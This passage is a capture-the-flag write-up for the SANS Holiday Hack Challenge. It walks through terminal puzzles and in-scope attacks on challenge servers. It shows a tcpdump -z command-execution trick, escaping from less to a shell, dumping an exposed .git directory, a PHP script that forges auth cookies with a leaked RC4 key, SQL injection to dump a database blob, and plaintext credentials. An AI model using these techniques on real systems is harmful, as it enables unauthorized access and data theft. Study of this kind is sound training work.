scratchy@4122555f51e0:~$ sudo -u itchy /usr/sbin/tcpdump -r /out.pcap -s 1514 -X > ~/d ata.out sudo: unable to resolve host 4122555f51e0 reading from file /out.pcap, link-type EN10MB (Ethernet) scratchy@4122555f51e0:~$ ls data.out scratchy@4122555f51e0:~$ head data.out 11:28:00.520764 IP > Flags [S], seq 28573488 50, win 65535, options [mss 1460,nop,wscale 5,nop,nop,TS val 2773686863 ecr 0,sackOK,e ol], length 0 0x0000: 4500 0040 8be7 4000 4006 b4fb c0a8 bc01 E..@..@.@....... 0x0010: c0a8 bc82 cb86 0050 aa4f aef2 0000 0000 .......P.O...... 0x0020: b002 ffff 586c 0000 0204 05b4 0103 0305 ....Xl.......... 0x0030: 0101 080a a553 1a4f 0000 0000 0402 0000 .....S.O........ 11:28:00.520829 IP > Flags [S.], seq 2484589 859, ack 2857348851, win 28960, options [mss 1460,sackOK,TS val 638274 ecr 2773686863, nop,wscale 7], length 0 0x0000: 4500 003c 0000 4000 4006 40e7 c0a8 bc82 E..<..@.@.@..... 0x0010: c0a8 bc01 0050 cb86 9417 d523 aa4f aef3 .....P.....#.O.. 0x0020: a012 7120 fa03 0000 0204 05b4 0402 080a ..q............. 0x0030: 0009 bd42 a553 1a4f 0103 0307 ...B.S.O....

Once I had the contents of each packet inside of a file, I used a little Bash one-liner to parse out the only the hex bytes.

scratchy@4122555f51e0:~$ cat packets_out 450000408be740004006b4fbc0a8bc01c0a8bc82cb860050aa4faef200000000b002ffff586c0000020405 b4010303050101080aa5531a4f00000000040200004500003c00004000400640e7c0a8bc82c0a8bc010050 cb869417d523aa4faef3a0127120fa030000020405b40402080a0009bd4 ...

I then copied the hex and, using the 010 Editor, pasted it into a new file as hex data. Below I highlighted the same HTML data I showed above to illustrate.

Once I had the binary file of packets, I used CapLoader to carve out all of the valid packets, which should be everything that was in the PCAP on the terminal.

Saving the carved out packets and opening them in Wireshark shows the expected data...except you'll notice on the right a huge amount of errors. Pro-tip, that's not a good sign.

Looking at the stream for the BIN file, we can see tons of bytes are missing.

I have half of the passphrase, so I decided to try and guess the second-half by using my elite hacking skills Google.

Ah, "Santa's Little Hackers" sounds right up the alley of the SANS Holiday Hack! Unfortunately it's not the password.

Then it slowly dawned on me...Itchy...Scratchy...Santa's Little Helper...mother-SANTA!.

The password for terminal 1 is "santaslittlehelper".

*NOTE* While I couldn't get it to work in this context, I learned about a "tcpdump" flag that can potentially allow command execution, which is pretty rad.

-z postrotate-command Used in conjunction with the -C or -G options, this will make tcpdumprun ” postrotate-command file ” where file is the savefile being closed after each rotation. For example, specifying -z gzipor -z bzip2 will compress each savefile using gzip or bzip2. A way to test this is to create a file… /tmp/.test and place the “id” command in it then run the command: “sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root”

Terminal 2 - Workshop - Santa's Office

Located in the bottom of the Workshop and leads to Santa's Office.

******************************************************************************* * * * To open the door, find the passphrase file deep in the directories. * * * *******************************************************************************

Taking a look at the files in our home directory show a hidden directory called ".doormat". This seemed like as good a place to start as any.

elf@7a713a46f2d2:~$ ls -lah total 32K drwxr-xr-x 20 elf elf 4.0K Dec 6 19:40 . drwxr-xr-x 22 root root 4.0K Dec 6 19:40 .. -rw-r--r-- 1 elf elf 220 Nov 12 2014 .bash_logout -rw-r--r-- 1 elf elf 3.9K Dec 6 19:40 .bashrc drwxr-xr-x 18 root root 4.0K Dec 6 19:40 .doormat -rw-r--r-- 1 elf elf 675 Nov 12 2014 .profile drwxr-xr-x 2 root root 4.0K Dec 6 19:39 temp drwxr-xr-x 2 root root 4.0K Dec 6 19:39 var

Since the banner says "deep in the directories", I decided to just recursively list all of the directories under ".doormat". Below is an excerpt from the command, showing a "key_for_the_door.txt".

./. / /\/\\: total 20K drwxr-xr-x 10 root root 4.0K Dec 6 19:40 . drwxr-xr-x 12 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 8 root root 4.0K Dec 6 19:40 Don't Look Here! drwxr-xr-x 2 root root 4.0K Dec 6 19:40 holiday drwxr-xr-x 2 root root 4.0K Dec 6 19:40 temp ./. / /\/\\/Don't Look Here!: total 20K drwxr-xr-x 8 root root 4.0K Dec 6 19:40 . drwxr-xr-x 10 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 6 root root 4.0K Dec 6 19:40 You are persistent, aren't you? drwxr-xr-x 2 root root 4.0K Dec 6 19:40 files drwxr-xr-x 2 root root 4.0K Dec 6 19:40 secret ./. / /\/\\/Don't Look Here!/You are persistent, aren't you?: total 20K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 ' drwxr-xr-x 6 root root 4.0K Dec 6 19:40 . drwxr-xr-x 8 root root 4.0K Dec 6 19:40 .. drwxr-xr-x 2 root root 4.0K Dec 6 19:40 cookbook drwxr-xr-x 2 root root 4.0K Dec 6 19:40 temp ./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/': total 12K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . drwxr-xr-x 6 root root 4.0K Dec 6 19:40 .. -rw-r--r-- 1 root root 17 Dec 6 19:39 key_for_the_door.txt ./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook: total 8.0K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . drwxr-xr-x 6 root root 4.0K Dec 6 19:40 .. ./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp: total 8.0K drwxr-xr-x 2 root root 4.0K Dec 6 19:40 . drwxr-xr-x 6 root root 4.0K Dec 6 19:40 ..

Last, a quick "cat" of the file.

elf@7a713a46f2d2:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you? /'$ cat key_for_the_door.txt key: open_sesame

The password for terminal 2 is "open_sesame".

Terminal 3 - Workshop - DFER

Located at the top of the Workshop.

******************************************************************************* * * * Find the passphrase from the wumpus. Play fair or cheat; it's up to you. * * * *******************************************************************************

In the home directory for the user, we find a binary called "wumpus" which turns out is an old text-based game called "Hunt the Wumpus" created in 1972. You essentially need to locate the Wumpus monster inside this labyrinth while avoiding bats and pitfalls.

elf@59db04db9088:~$ ls -lah total 48K drwxr-xr-x 2 elf elf 4.0K Dec 12 21:52 . drwxr-xr-x 6 root root 4.0K Dec 12 21:52 .. -rw-r--r-- 1 elf elf 220 Nov 12 2014 .bash_logout -rw-r--r-- 1 elf elf 3.9K Dec 12 21:52 .bashrc -rw-r--r-- 1 elf elf 675 Nov 12 2014 .profile -rwxr-xr-x 1 root root 28K Dec 5 23:32 wumpus elf@59db04db9088:~$ ./wumpus Instructions? (y-n) y Sorry, but the instruction file seems to have disappeared in a puff of greasy black smoke! (poof) You're in a cave with 20 rooms and 3 tunnels leading from each room. There are 3 bats and 3 pits scattered throughout the cave, and your quiver holds 5 custom super anti-evil Wumpus arrows. Good luck. You are in room 11 of the cave, and have 5 arrows left. *sniff* (I can smell the evil Wumpus nearby!) There are tunnels to rooms 4, 7, and 18.

I spent a fair amount of time trying to map the labyrinth out, as they let you play the same one every time you die. I'm not sure if the original is like this or if it's a modified version, but room connections and dangers continued to shift after each death and made mapping fairly impossible.

Peering at the strings revealed some interesting data.

Instructions? (y-n) wump.info Sorry, but the instruction file seems to have disappeared in a puff of greasy black smoke! (poof) PAGER /usr/bin/less open %s dup2 /bin/sh exec sh -c %s fork usage: wump [parameters]

Notice how when I originally started the game it said "the instruction file seems to have disappeared"? Creating a "wump.info" file in the same directory changed the output of the application. It's clear that the application is trying to call "less" on it.

elf@2f5ad872f71b:~$ echo "id" > wump.info elf@2f5ad872f71b:~$ ./wumpus Instructions? (y-n) y sh: 1: /usr/bin/less: not found You're in a cave with 20 rooms and 3 tunnels leading from each room.

I didn't find a way to hijack "less" and possibly get command-execution, but it turned out to be unnecessary. While researching the game, I stumbled upon this website which lets you play the original game online. For whatever reason, being able to visualize the game in boxes let me understand the core mechanic of the game and I was able to beat it within a few turns.

You are in room 19 of the cave, and have 5 arrows left. *whoosh* (I feel a draft from some pits). *sniff* (I can smell the evil Wumpus nearby!) There are tunnels to rooms 6, 12, and 16. Move or shoot? (m-s) s 6 You are in room 19 of the cave, and have 4 arrows left. *whoosh* (I feel a draft from some pits). *sniff* (I can smell the evil Wumpus nearby!) There are tunnels to rooms 6, 12, and 16. Move or shoot? (m-s) s 12 *thwock!* *groan* *crash* A horrible roar fills the cave, and you realize, with a smile, that you have slain the evil Wumpus and won the game! You don't want to tarry for long, however, because not only is the Wumpus famous, but the stench of dead Wumpus is also quite well known, a stench plenty enough to slay the mightiest adventurer at a single whiff!! Passphrase: WUMPUS IS MISUNDERSTOOD

Basically, try to imagine a box of 9 squares with the Wumpus in the center. If you get the message that he's around, then move into another room - if you get the same message, then you know you're on the outside of the 9 and he's *potentially* in a room on either side of you. Let your arrows rain down death upon the Wumpus!

The password for terminal 3 is "WUMPUS IS MISUNDERSTOOD".

Terminal 4 - Santa's Office

Located directly past the Terminal 2 door. The password panel is hidden in the bookshelf.


I'll be honest and say that this one didn't immediately jump out at me. *turns in hacker-card* A quick Google of that phrase shows that it's a quote from the AI in WarGames...D'oh!

As soon as I knew it was WarGames I knew exactly what scene this was from. After some time on YouTube trying to find the full thing, I located this bad boy.

The terminal follows the dialogue of the movie verbatim.

GREETINGS PROFESSOR FALKEN. Hello. HOW ARE YOU FEELING TODAY? I'm fine. How are you? EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73? People sometimes make mistakes. YES THEY DO. SHALL WE PLAY A GAME? Love to. How about Global Thermonuclear War? WOULDN'T YOU PREFER A GOOD GAME OF CHESS? Later. Let's play Global Thermonuclear War. Fine.

Even to the point of only allowing you to play as the Ruskies...lame! :)_

,------~~v,_ _ _--^\ |' \ ,__/ || _/ /,_ _ / \,/ / ,, _,,/^ v v-___ | / |'~^ \ \ | _/ _ _/^ \ / / ,~~^/ | ^~~_ _ _ / | __,, _v__\ \/ '~~, , ~ \ \ ^~ / ~ // \/ \/ \~, ,/ ~~ UNITED STATES SOVIET UNION WHICH SIDE DO YOU WANT? 1. UNITED STATES 2. SOVIET UNION PLEASE CHOOSE ONE: 2

I always hated going to security cons in Vegas anyway!


The password for terminal 4 is "LOOK AT THE PRETTY LIGHTS".

Terminal 5 - Workshop - Train Station

Located at the train station in the Workshop.

Train Management Console: AUTHORIZED USERS ONLY ==== MAIN MENU ==== STATUS: Train Status BRAKEON: Set Brakes BRAKEOFF: Release Brakes START: Start Train HELP: Open the help document QUIT: Exit console menu:main>

This one is slightly different as it doesn't necessarily tell you what you need to do. Based on the menu, it seems pretty clear you need to start the train.

Starting with the "HELP" command I noticed something right off the bat. It's the same recipe I use for my cranberry pie!

Oh, and that it looks like LESS!

I attempted to break out of this by using the "!" command to pass through an external command for execution, specifically "!/bin/bash".

menu:main> HELP sh-4.3$ id uid=1000(conductor) gid=1000(conductor) groups=1000(conductor) sh-4.3$ ls ActivateTrain TrainHelper.txt Train_Console sh-4.3$ ls -lah total 40K drwxr-xr-x 2 conductor conductor 4.0K Dec 10 19:39 . drwxr-xr-x 6 root root 4.0K Dec 10 19:39 .. -rw-r--r-- 1 conductor conductor 220 Nov 12 2014 .bash_logout -rw-r--r-- 1 conductor conductor 3.5K Nov 12 2014 .bashrc -rw-r--r-- 1 conductor conductor 675 Nov 12 2014 .profile -rwxr-xr-x 1 root root 11K Dec 10 19:36 ActivateTrain -rw-r--r-- 1 root root 1.5K Dec 10 19:36 TrainHelper.txt -rwxr-xr-x 1 root root 1.6K Dec 10 19:36 Train_Console


Activating the program "ActivateTrain" starts the train and takes us back in time.

This warps us back to the year 1978, where most of the Elves are children, SD cards haven't been invented, and you can't escape "We Will Rock You" on the radio.

When you enter the DFER (Santa's Dungeon For Errant Reindeer) in 1978, the jolly man appears, answering the last part of this question.

Santa appears to have come down with amnesia and doesn't remember who kidnapped him - back to sleuthing!

Question 07 - Will Hack for MP3's

7) ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN AT THE NORTH POLE, ATTEMPT TO REMOTELY EXPLOIT EACH OF THE FOLLOWING TARGETS: The Mobile Analytics Server (via credentialed login access) The Dungeon Game The Debug Server The Banner Ad Server The Uncaught Exception Handler Server The Mobile Analytics Server (post authentication) For each of those six items, which vulnerabilities did you discover and exploit? REMEMBER, YOU ARE AUTHORIZED TO ATTACK ONLY THE IP ADDRESSES THAT TOM HESSMAN IN THE NORTH POLE EXPLICITLY ACKNOWLEDGES AS "IN SCOPE." ATTACK NO OTHER SYSTEMS ASSOCIATED WITH THE HOLIDAY HACK CHALLENGE.

Alright, we need to grab 6 MP3's spread across 5 servers. Going back to the APK, if we look in Bytecode Viewer at file "SantaGram_4.2/res/values/strings.xml", we can identify all of the URLs for the servers above.

Below is my compiled list of URLs and whether they are in-scope or not, along with a quick DNS lookup.

http://northpolewonderland.com - OUT OF SCOPE $ host northpolewonderland.com northpolewonderland.com has address https://analytics.northpolewonderland.com/report.php?type=launch - IN SCOPE https://analytics.northpolewonderland.com/report.php?type=usage - IN SCOPE $ host analytics.northpolewonderland.com analytics.northpolewonderland.com has address http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5 - IN SCOPE $ host ads.northpolewonderland.com ads.northpolewonderland.com has address http://dev.northpolewonderland.com/index.php - IN SCOPE $ host dev.northpolewonderland.com dev.northpolewonderland.com has address http://dungeon.northpolewonderland.com - IN SCOPE $ host dungeon.northpolewonderland.com dungeon.northpolewonderland.com has address http://ex.northpolewonderland.com/exception.php - IN SCOPE $ host ex.northpolewonderland.com ex.northpolewonderland.com has address

The Mobile Analytics Server

First things first, a quick Nmap scan to see what's open to us.

# nmap -sC analytics.northpolewonderland.com Starting Nmap 7.12 ( https://nmap.org ) at 2016-12-14 10:46 EST Nmap scan report for analytics.northpolewonderland.com ( Host is up (0.025s latency). Other addresses for analytics.northpolewonderland.com (not scanned): rDNS record for Not shown: 998 filtered ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA) | 2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA) |_ 256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA) 443/tcp open https | http-git: | | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: Finishing touches (style, css, etc) | http-title: Sprusage Usage Reporter! |_Requested resource was login.php | ssl-cert: Subject: commonName=analytics.northpolewonderland.com | Not valid before: 2016-12-07T17:35:00 |_Not valid after: 2017-03-07T17:35:00 |_ssl-date: TLS randomness does not represent time | tls-nextprotoneg: |_ http/1.1 Nmap done: 1 IP address (1 host up) scanned in 19.21 seconds

Always brings a smile to my face when I find a Git repo!

A quick "wget" of the website pulls down all of the files within the "/.git/" directory and then we can use the below one-liner to decompress the object files in "/.git/objects" with openssl's zlib module and get access to the source code of the website.

$ for i in $(find ./); do openssl zlib -d < $i > $i.out

Looking at the strings of the "index.html" file reveals a number of directories and files, which gives us a good idea of the layout of the site.

README.md crypto.php css/bootstrap-theme.css css/bootstrap-theme.css.map css/bootstrap-theme.min.css css/bootstrap-theme.min.css.map css/bootstrap.css css/bootstrap.css.map css/bootstrap.min.css css/bootstrap.min.css.map css/bootstrap.min.css.orig db.php edit.php fonts/glyphicons-halflings-regular.eot fonts/glyphicons-halflings-regular.svg fonts/glyphicons-halflings-regular.ttf fonts/glyphicons-halflings-regular.woff fonts/glyphicons-halflings-regular.woff2 footer.php getaudio.php header.php index.php js/bootstrap.js js/bootstrap.min.js js/npm.js login.php logout.php mp3.php query.php report.php sprusage.sql test/Gemfile test/Gemfile.lock test/test_client.rb this_is_html.php this_is_json.php uuid.php view.php

Since we can only see the "login.php" page, I decide to start there and recursively grep the object files for a string on the page and then review the code.

$ grep -aR "Please login to use the application" * 25/92098ead7ae87e50b561a95a9e51e4195ef140.out: <p class="lead">Please login to use the application</p>

Reviewing the object file ".git/objects/25/92098ead7ae87e50b561a95a9e51e4195ef140.out" we find the below section of code.

} else { require_once('db.php'); check_user($db, $_POST['username'], $_POST['password']); print "Successfully logged in!"; $auth = encrypt(json_encode([ 'username' => $_POST['username'], 'date' => date(DateTime::ISO8601), ])); setcookie('AUTH', bin2hex($auth)); header('Location: index.php?msg=Successfully%20logged%20in!'); } ?>

It looks like a cookie is created by taking the JSON structure of username and date and passing it to the "encrypt" function.

Searching for the encryption function, I find it in ".git/objects/7a/b24db36e53d8aeb6943729e83b5f6f530a73f7.out".

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc"); function encrypt($data) { return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream'); }

Now we have everything we need to generate our own authentication cookie, the only thing we need now is an account name.

In the object file ".git/objects/0a/d23f39b6572ebd114071c801e2140f7092e8a8.out" I find code that refers to the "guest" account.

// EXPERIMENTAL! Only allow guest to download. if ($username === 'guest') { $result = query($db, "SELECT * FROM `audio` WHERE `id` = '" . mysqli_real_escape_string($db, $_GET['id']) . "' and `username` = '" . mysqli_real_escape_string($db, $username) . "'");

The below is a PHP script that will generate authentication cookies that we can apply to the "AUTH" value.

# cat gentoken.php <?php define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc"); function encrypt($data) { return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream'); } $auth = encrypt(json_encode(['username' => "guest", 'date' => date(DateTime::ISO8601),])); echo bin2hex($auth); ?>

Our auth token for the "guest" account.

# php gentoken.php 82532b2136348aaa1fa7dd2243da1cc9fb13037c49259e5ed70768d4e9baa1c80b97fee8bfa42881f178bb70c49e0955b14648637bec

Setting our cookie in Cookies Manager+ we successfully gain access to the "guest" account.

At the top of the page is a button labeled "MP3" which lets us download "discombobulatedaudio2.mp3".

Since we know there are two MP3 files on this server, we'll continue on.

Taking a look at the "index.php" page in object file "./git/objects/63/e494c4654066d2ee8f28135b1855dda23d88f7.out", we see that the MP3 button only appears if we're logged in as "guest", but we also learn there is an "administrator" account with an "Edit" button instead.

<?php if (get_username() == 'guest') { ?> <li><a href="/<?= mp3_web_path($db); ?>">MP3</a></li> <?php } if (get_username() == 'administrator') { ?> <li><a href="/edit.php">Edit</a></li> <?php

We find the code for the "mp3_web_path" function in object file "./git/objects/10/d46fe7c496411ff18f9177d6f99c25f2d0400a.out" and shows that our user-ID is passed as a parameter to the "getaudio.php" file.

function mp3_web_path($db) { $result = query($db, "SELECT `id` FROM `audio` WHERE `username` = '" . mysqli_real_escape_string($db, get_username()) . "'"); if (!$result) { return null; } return 'getaudio.php?id=' . $result[0]['id']; }

Let's go ahead and generate the "administrator" account cookie and see if we can get the user-ID to pass to the "getaudio.php" file.

# php test.php 82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d86e573b965cf9e6549b8494d6063a50565b71c76884152

After logging in as the "administrator" account I reviewed "getaudio.php" found in object file ".git/objects/0a/d23f39b6572ebd114071c801e2140f7092e8a8.out". Unfortunately, my hopes of just passing an ID were quickly dashed with the below code.

// EXPERIMENTAL! Only allow guest to download. if ($username === 'guest') { $result = query($db, "SELECT * FROM `audio` WHERE `id` = '" . mysqli_real_escape_string($db, $_GET['id']) . "' and `username` = '" . mysqli_real_escape_string($db, $username) . "'");

The ID is gathered by unpacking the "AUTH" cookie and getting the username and then looking it up within the database. All hopes of SQLi through these functions get crushed by parameterized values and the mysqli_real_escape_string function.

I found that I was able to inject reports into the database through the "report.php" page that was found in the APK resources, but ultimately could not get it to render any PHP due to the mysql_real_escape_string and htmlentities functions. Along with this, since there were so many object files, I quite frequently found older versions of a pages which contained vulnerabilities that weren't actually exploitable in the currently deployed iteration so I chased a lot of red herrings.

Taking a step back, the "administrator" account is given access to a new page so it makes sense to think that page will be crucial is completing this attack. The "Edit" page lets you edit saved queries from the "Query Engine". The queries allow you to lookup reported information, presumably from the SantaGram application.

Reviewing the code in object file ".git/objects/b7/5048eda4700268b38de8aff1dfec5a8f023ab5.out" shows how the queries are built for the "report" table; specifically there is a "id", "name", "description", and "query" value.

$query = "SELECT * "; $query .= "FROM `app_" . $type . "_reports` "; $query .= "WHERE " . join(' AND ', $where) . " "; $query .= "LIMIT 0, 100"; if(isset($_REQUEST['save'])) { $id = gen_uuid(); $name = "report-$id"; $description = "Report generated @ " . date('Y-m-d H:i:s'); $result = mysqli_query($db, "INSERT INTO `reports` (`id`, `name`, `description`, `query`) VALUES ('$id', '$name', '$description', '" . mysqli_real_escape_string($db, $query) . "') ");

When I reviewed "edit.php" in the object file ".git/objects/c0/8beb21bd744a41d784eb9b1e9e90d2b3a884cc.out", I noticed it checks if if the "id" value is passed as a parameter with "$_GET['id']". If that parameter exists, it checks the rest of the parameters in the URI and subsequently updates each field in the database with the provided value, if it doesn't then it uses the values passed through the webpage.

$result = mysqli_query($db, "SELECT * FROM `reports` WHERE `id`='" . mysqli_real_escape_string($db, $_GET['id']) . "' LIMIT 0, 1"); if(!$result) { reply(500, "MySQL Error: " . mysqli_error($db)); die(); } $row = mysqli_fetch_assoc($result); # Update the row with the new values $set = []; foreach($row as $name => $value) { print "Checking for " . htmlentities($name) . "...<br>"; if(isset($_GET[$name])) { print 'Yup!<br>'; $set[] = "`$name`='" . mysqli_real_escape_string($db, $_GET[$name]) . "'"; } }

Notice what's missing?

The "query" value isn't available via the website but should be available via the URI! A quick sanity check of "view.php" to make sure it doesn't filter out the query in any way.

<?php format_sql(query($db, $row['query'])); }

Now we're onto something if we can craft a SQL query that lets us dump the MP3 file from the database.

In the object file ".git/objects/49/76b1415ee55aa3a757db375d0f24a826e1c85f.out" we find a SQL dump and see how our "audio" table is constructed.

CREATE TABLE `audio` ( `id` varchar(36) NOT NULL, `username` varchar(32) NOT NULL, `filename` varchar(32) NOT NULL, `mp3` MEDIUMBLOB NOT NULL, PRIMARY KEY (`id`)

A quick validation by sumbitting the below URL...


Then browsing to it via "view.php"...

Now that we validated injection, it's time to dump that MP3!

As "MEDIUMBLOB" is a byte string, I opted to convert it to hex and extract it that way via the website.


The result.

A quick copy and paste again into the 010 Editor and we now have "discombobulatedaudio7.mp3".

*NOTE* The below was also found in the database file. The "administrator" credentials are valid but the "guest" one does not work. It was a moot point due to the cookie generator I wrote.

INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');

The Dungeon Game

Nmap reveals a socket listening on TCP/111111 and a webserver which has instructions for a game called "Dungeon".

Starting Nmap 7.12 ( https://nmap.org ) at 2016-12-14 10:46 EST Nmap scan report for dungeon.northpolewonderland.com ( Host is up (0.94s latency). Other addresses for dungeon.northpolewonderland.com (not scanned): rDNS record for Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 4e:cd:15:a7:44:ed:87:d5:41:81:c2:0e:78:db:c0:d0 (DSA) | 2048 5b:14:72:d1:17:a2:3f:98:fb:fe:6c:7d:29:49:19:a2 (RSA) |_ 256 6a:8d:56:49:a3:f5:8c:fd:14:42:a7:c0:4e:ef:a8:64 (ECDSA) 80/tcp open http |_http-title: About Dungeon 11111/tcp open vce Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds

If you're not familiar with this game, it's a variant of Zork which is another old-school text-based adventure game. You enter commands and navigate the game world to collect treasure. I hate Zork. I hated it in the 80's, I hated in the 90's, and I've continued to hate it for each decade since. I'd almost forgotten how much I disliked this game until I had to play it again here.

$ nc dungeon.northpolewonderland.com 11111 Welcome to Dungeon. This version created 11-MAR-78. You are in an open field west of a big white house with a boarded front door. There is a small wrapped mailbox here. >open mailbox Opening the mailbox reveals: A leaflet. >read leaflet Taken. Welcome to Holiay Hack Challenge Dungeon! Dungeon is a game of adventure, danger, and low cunning. In it you will explore some of the most amazing territory ever seen by mortal man. Hardened adventurers have run screaming from the terrors contained within. In Dungeon, the intrepid explorer delves into the forgotten secrets of a lost labyrinth deep in the bowels of the earth, searching for vast treasures long hidden from prying eyes, treasures guarded by fearsome monsters and diabolical traps! Your mission is to find the elf at the North Pole and barter with him for information about holiday artifacts you need to complete your quest. While the original mission objective of collecting twenty treassures to place in the trophy case is still in play, it is not necessary to finish your quest. No DECsystem should be without one! Dungeon was created at the Programming Technology Division of the MIT Laboratory for Computer Science by Tim Anderson, Marc Blank, Bruce Daniels, and Dave Lebling. It was inspired by the Adventure game of Crowther and Woods, and the Dungeons and Dragons game of Gygax and Arneson. The original version was written in MDL (alias MUDDLE). The current version was translated from MDL into FORTRAN IV by a somewhat paranoid DEC engineer who prefers to remain anonymous, and was later translated to C. On-line information may be obtained with the commands HELP and INFO.

We're also given quite a few hints from our friendly Elves.

<Alabaster Snowball> - Hi, I'm Alabaster Snowball. I'm a bug bounty hunter! <Alabaster Snowball> - Did Pepper send you? She's obsessed with Dungeon! <Alabaster Snowball> - I don't know if Dungeon can be won. I do believe there is a way to cheat though...


<Pepper Minstix> - When I need a break from bug bounty work, I play Dungeon. I've been playing it since 1978. I still have yet to beat the Cyclops... <Pepper Minstix> - Alabaster's brother is the only elf I've ever seen beat it, and he really immersed himself in the game. I have an old version here.

I decided to try and play the game, which directly correlates to my hate of the game. Many hours went into using the maps found here to try and navigate the game.

Since the Elf hinted at beating the Cyclops, I hoped that I would find the new Elf NPC in that area...I was wrong. But I still grabbed the egg, killed a troll, and made it all the way past the Cyclops to fight the Thief! I was actually pretty pleased with that but I kept getting killed by the Thief, presumably because I didn't have a high enough score yet.

open mailbox read drop n n u get egg open egg d s s e s w s n e open window enter take sack w take sword take lantern move rug open trap door down turn on lantern e attack troll s e e s w u take coins take keys sw e s ne Ulysses u give egg d n e e u take knife d w w s u kill thief

I decided to take a look at the binary and approach this problem differently since I didn't seem to make headway playing legit.

# file dungeon dungeon: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=98dcce48be68f3ec423311876266acb5e097a01b, not stripped

So we have a 64-bit ELF binary (elf...heh) that hasn't been stripped. Checking out the strings revealed some interesting entries as well. Below is a snippit containing the juicy parts.

DRDODADCDXDHDLDVDFDSAFHENRNTNCNDRRRTRCRDTKEXARAOAAACAXAVD2DNANDMDTAHDPPDDZAZHH You are not an authorized user. GDT> Idx,Ary: %d %d Limits: Entry: RM# DESC1 DESC2 EXITS ACTION VALUE FLAGS %6d OB# DESC1 DESC2 DESCO ACT FLAGS1 FLAGS2 FVL TVL SIZE CAPAC ROOM ADV CON READ %3d%6d%6d%6d%4d%7d%7d%4d%4d%6d%6d %4d%4d%4d%6d AD# ROOM SCORE VEHIC OBJECT ACTION STREN FLAGS CL# TICK ACTION FLAG %3d %6d %6d %c RANGE CONTENTS %3d-%3d THFPOS= %d, THFFLG= %c, THFACT= %c SWDACT= %c, SWDSTA= %d R=%d, X=%d, O=%d, C=%d V=%d, A=%d, M=%d, R2=%d MBASE=%d, STRBIT=%d VL# OBJECT PROB OPPS BEST MELEE Flag #%-2d = %c Parse vector= %6d %6d %6d %c %6d Play vector= %6d %6d %c State vector= %6d %6d %6d %6d %6d %6d %6d %6d %6d %6d %6d Scol vector= %6d %6d %6d Old= %c New= Valid commands are: AA- Alter ADVS DR- Display ROOMS AC- Alter CEVENT DS- Display state AF- Alter FINDEX DT- Display text AH- Alter HERE DV- Display VILLS AN- Alter switches DX- Display EXITS AO- Alter OBJCTS DZ- Display PUZZLE AR- Alter ROOMS D2- Display ROOM2 AV- Alter VILLS EX- Exit AX- Alter EXITS HE- Type this message AZ- Alter PUZZLE NC- No cyclops DA- Display ADVS ND- No deaths DC- Display CEVENT NR- No robber DF- Display FINDEX NT- No troll DH- Display HACKS PD- Program detail DL- Display lengths RC- Restore cyclops DM- Display RTEXT RD- Restore deaths DN- Display switches RR- Restore robber DO- Display OBJCTS RT- Restore troll DP- Display parser TK- Take No robber. No troll. No cyclops. No deaths. Restored robber. Restored troll. Restored cyclops. Restored deaths. Taken. Old = %6d New = Old= %6d New= Old = %6d New= #%2d Room=%6d Obj=%6d

No deaths? Sign me up!

Googling a few of those strings led me to this Github page for the file "zork/gdt.c".


Typing "gdt" in the game gives us access to the menu I found in the binary strings output.

The "nd" command flips on god-mode and I finally put the Thief to rest! But...I still couldn't find the Elf anywhere around that area. Argh!

After a breather and some Zork research online, I found just one website which mentioned this incantation you can cast within the game to automatically warp to the endgame! Surely, the Elf will be at the endgame!

incant, DNZHUO IDEQTQ d n break beam s push button n n enter lift short pole push red wall push red wall push short pole push mahogany wall push mahogany wall push mahogany wall push mahogany wall lift short pole push red wall push red wall push red wall push red wall push pine wall n

Pro-tip: He's not. SANTA ZORK! Since I had god-mode enabled, I also got stuck in this location since you're not supposed to actually be able to survive the attack by the Guardians once you step through the Pine Wall into the open field...

Going back to the drawing-board I decided to take another look at the GDT menu and noticed this gem "TK", or "Take", and had the bright idea that maybe I could just take all of the 20 treasures I needed and beat the game "legitimately" since so much seems to be based on your score (it kept telling me my score rank was "Hacker".

Playing around with the command, it effectively just takes a number as an argument and puts the corresponding object into your inventory. There didn't appear to be any rhyme or reason as to the layout of objects in the array and it even held non-inventory based items, such-as glaciers, a large tree, and a cliff.

I determined I'd need to enumerate all of the objects to find the indexes of the treasure and wrote a quick script to take a set of objects and then check my inventory. Below is an example of the first few objects, along with my notation for object number of the treasures needed to win the game.

